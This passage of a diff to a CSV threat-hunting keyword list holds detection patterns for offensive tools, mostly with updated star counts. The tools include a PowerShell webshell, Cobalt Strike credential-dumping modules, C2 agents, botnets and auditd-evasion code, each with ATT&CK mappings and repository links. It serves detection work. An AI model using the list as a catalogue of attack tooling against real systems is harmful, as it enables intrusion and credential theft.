T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" -"*/antak.aspx*","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/antak.aspx*","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*/anthemtotheego/CredBandit*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*/AntiSandbox.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*/AntiSandbox.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" @@ -2701,12 +2704,12 @@ "*/apollon-main.zip*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*/apollon-selective-x64*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*/ApolloTest.exe","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*/aquasecurity/cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" -"*/Ares.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"*/ares.py *","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*/aquasecurity/cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*/Ares.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*/ares.py *","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*/armitage.git*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" -"*/arp_scanner.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/arp_spoof/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/arp_scanner.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/arp_spoof/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/artifactor.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/ase_docker/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/asn-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -2716,65 +2719,65 @@ "*/ASRenum.cs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" "*/ASRenum-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" "*/ASREPRoast*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" -"*/asreproast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/asreproast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/assets/bin2uuids_file.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/assets/bin2uuids_file.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" "*/asyncssh_server.py*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*/atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*/Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.Profiles.*.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.Profiles.*.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.Profiles.*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.sln*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena/Assembly/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena/Commands/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/athena/mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/athena_utils/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AthenaPlugins/bin/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AthenaSMB/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AthenaTests/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AtlasReaper.git*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","202","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*/atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some 